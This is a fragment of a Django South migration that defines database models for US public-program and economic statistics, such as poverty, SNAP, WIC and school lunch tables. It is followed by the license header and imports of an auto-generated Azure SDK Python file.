'data.pupilteacherstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'PupilTeacherState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ratio': ('django.db.models.fields.FloatField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.pupilteacherstateraw': {
'Meta': {'object_name': 'PupilTeacherStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ratio': ('django.db.models.fields.FloatField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.race': {
'Meta': {'object_name': 'Race'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'race_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'race_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'race_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.racecombo': {
'Meta': {'object_name': 'RaceCombo'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'race_combo_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'race_combo_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.retireddisablednilf': {
'Meta': {'object_name': 'RetiredDisabledNilf'},
'disabled_not_in_labor_force': ('django.db.models.fields.IntegerField', [], {}),
'employed_absent': ('django.db.models.fields.IntegerField', [], {}),
'employed_at_work': ('django.db.models.fields.IntegerField', [], {}),
'employed_on_layoff': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'other_not_in_labor_force': ('django.db.models.fields.IntegerField', [], {}),
'retired_not_in_labor_force': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total': ('django.db.models.fields.IntegerField', [], {}),
'unemployed_looking': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.saipecountystate': {
'Meta': {'object_name': 'SaipeCountyState'},
'age_0_17_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_17_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_17_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_17_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_17_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_17_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_5_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_5_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_5_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_0_5_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_5_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_5_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_17_related_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_5_17_related_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_5_17_related_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'age_5_17_related_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_17_related_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_5_17_related_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'all_age_poverty': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_age_poverty_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_age_poverty_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_age_poverty_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'all_age_poverty_percent_90_lower': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'all_age_poverty_percent_90_upper': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'file_tag': ('django.db.models.fields.CharField', [], {'max_length': '22'}),
'fips_county': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'fips_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'median_household_income': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'median_household_income_90_lower': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'median_household_income_90_upper': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state_county_name': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'state_postal_abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.saipeschool': {
'Meta': {'object_name': 'SaipeSchool'},
'ccd_district_id': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'district_name': ('django.db.models.fields.CharField', [], {'max_length': '65'}),
'file_stamp': ('django.db.models.fields.CharField', [], {'max_length': '21'}),
'fips_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {}),
'relevant_population': ('django.db.models.fields.IntegerField', [], {}),
'relevant_population_poverty': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schipenrollmentstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SchipEnrollmentState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schipenrollmentstateraw': {
'Meta': {'object_name': 'SchipEnrollmentStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoolbreakfastparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SchoolBreakfastParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoolbreakfastparticipationstateraw': {
'Meta': {'object_name': 'SchoolBreakfastParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoollunchparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SchoolLunchParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.schoollunchparticipationstateraw': {
'Meta': {'object_name': 'SchoolLunchParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.shelterpopulation': {
'Meta': {'object_name': 'ShelterPopulation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapbenefitsrecipients': {
'Meta': {'object_name': 'SnapBenefitsRecipients'},
'county_fips': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapmonthlybenefitspersonstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SnapMonthlyBenefitsPersonState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapmonthlybenefitspersonstateraw': {
'Meta': {'object_name': 'SnapMonthlyBenefitsPersonStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationhouseholdsstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SnapParticipationHouseholdsState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationhouseholdsstateraw': {
'Meta': {'object_name': 'SnapParticipationHouseholdsStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationpeoplestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SnapParticipationPeopleState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.snapparticipationpeoplestateraw': {
'Meta': {'object_name': 'SnapParticipationPeopleStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.source': {
'Meta': {'object_name': 'Source'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'string_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'data.specialedfunding': {
'Meta': {'object_name': 'SpecialEdFunding'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.state': {
'Meta': {'object_name': 'State'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'state_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2'}),
'state_ansi': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2'}),
'state_desc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'state_gnisid': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'state_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.statecompletionrate': {
'Meta': {'object_name': 'StateCompletionRate'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.stategdp': {
'Meta': {'object_name': 'StateGdp'},
'component': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'component_code': ('django.db.models.fields.IntegerField', [], {}),
'fips': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'industry': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'industry_code': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.stategdppre97': {
'Meta': {'object_name': 'StateGdpPre97'},
'component': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'component_code': ('django.db.models.fields.IntegerField', [], {}),
'fips': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'industry': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'industry_code': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.statepostalcodes': {
'Meta': {'object_name': 'StatePostalCodes'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'data.staterenewableenergy': {
'Meta': {'object_name': 'StateRenewableEnergy'},
'fossil_coal': ('django.db.models.fields.FloatField', [], {}),
'fossil_gas': ('django.db.models.fields.FloatField', [], {}),
'fossil_oil': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nuclear_electric': ('django.db.models.fields.FloatField', [], {}),
'renewable_biofuels': ('django.db.models.fields.FloatField', [], {}),
'renewable_other': ('django.db.models.fields.FloatField', [], {}),
'renewable_total': ('django.db.models.fields.FloatField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.subfunctionscffr': {
'Meta': {'object_name': 'SubfunctionsCffr'},
'at_code_1': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_2': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_3': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_4': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_5': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_6': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_7': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_8': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'cfda_program_code': ('django.db.models.fields.TextField', [], {'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program_name': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'subfunction_name': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'subfunction_number': ('django.db.models.fields.TextField', [], {'max_length': '3'})
},
'data.summerlunchparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SummerLunchParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.summerlunchparticipationstateraw': {
'Meta': {'object_name': 'SummerLunchParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.tanffamilystateraw': {
'Meta': {'object_name': 'TanfFamilyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.tanfparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'TanfParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'family': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.tanfparticipationstateraw': {
'Meta': {'object_name': 'TanfParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.titleifunding': {
'Meta': {'object_name': 'TitleIFunding'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.totalstudents': {
'Meta': {'object_name': 'TotalStudents'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.usaspendingassistanceraw': {
'Meta': {'object_name': 'UsaspendingAssistanceRaw'},
'agency_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'assistance_type': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'assistance_type_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'asst_cat_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'cfda_program_num': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'cfda_program_title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'face_loan_guran': ('django.db.models.fields.BigIntegerField', [], {}),
'fed_funding_amount': ('django.db.models.fields.BigIntegerField', [], {}),
'fiscal_year': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'non_fed_funding_amount': ('django.db.models.fields.BigIntegerField', [], {}),
'orig_sub_guran': ('django.db.models.fields.BigIntegerField', [], {}),
'recip_cat_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'recip_cat_type_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'recipient_country_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'recipient_county_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'recipient_state_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'total_funding_amount': ('django.db.models.fields.BigIntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.vehicleregistrations': {
'Meta': {'object_name': 'VehicleRegistrations'},
'all_private': ('django.db.models.fields.IntegerField', [], {}),
'all_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_total': ('django.db.models.fields.IntegerField', [], {}),
'auto_private': ('django.db.models.fields.IntegerField', [], {}),
'auto_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'auto_total': ('django.db.models.fields.IntegerField', [], {}),
'buses_private': ('django.db.models.fields.IntegerField', [], {}),
'buses_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'buses_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'motorcycle_private': ('django.db.models.fields.IntegerField', [], {}),
'motorcycle_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'private_commercial_per_capita': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'trucks_private': ('django.db.models.fields.IntegerField', [], {}),
'trucks_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'trucks_total': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.vocationaledspending': {
'Meta': {'object_name': 'VocationalEdSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicbenefitsstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'WicBenefitsState'},
'amount': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicbenefitsstateraw': {
'Meta': {'object_name': 'WicBenefitsStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'place': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'WicParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicparticipationstateraw': {
'Meta': {'object_name': 'WicParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'place': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['data']
|
npp/npp-api
|
data/migrations/0032_auto__add_unique_cfda_program_number.py
|
Python
|
mit
| 165,019
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
